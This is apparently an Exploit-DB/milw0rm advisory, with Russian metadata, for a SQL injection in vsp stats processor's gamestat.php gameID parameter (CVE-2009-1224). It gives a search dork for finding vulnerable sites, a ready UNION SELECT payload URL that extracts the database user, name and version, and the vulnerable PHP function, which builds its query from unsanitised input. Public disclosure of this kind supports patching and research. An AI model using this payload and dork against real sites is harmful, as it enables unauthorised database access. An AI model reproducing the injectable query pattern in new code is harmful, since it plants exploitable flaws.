Exploit vsp stats processor 0.45 - 'gamestat.php?gameID' SQL Injection

[Exploiter]

EDB-ID

8331

Проверка EDB

1. Пройдено

Автор

DIMI4

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2009-1224

Дата публикации

2009-03-31

########################################
#                                         #
# Product : vsp stats processor           #
# Version : all                           #
# Dork : "powered by vsp stats processor" #
# Site: http://www.scivox.net/vsp/        #
# Found by: Dimi4                         #
# Date : 31.03.09                         #
# Greetz: antichat                        #
#                                         #
########################################

SQL-injection
[+] URL: http://target.com/vsp-core/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x203a20,user(),database(),version()),2/*&config=cfg-default.php
[+] Output: <option> {DATA} </option>

Bug Function: (vsp-core\pub\themes\bismarck\gamestat.php 540-558 lines)

 function getStatsGame()
{
  global $db;
  global $ggame;
  $sql = "select name, value
            from {$GLOBALS['cfg']['db']['table_prefix']}gamedata
            where gameID=$GLOBALS[gameID]
         ";

  //echo $sql;
  $rs = $db->Execute($sql);

.....
}


(c) Dimi4, 2009 greetz to antichat

# milw0rm.com [2009-03-31]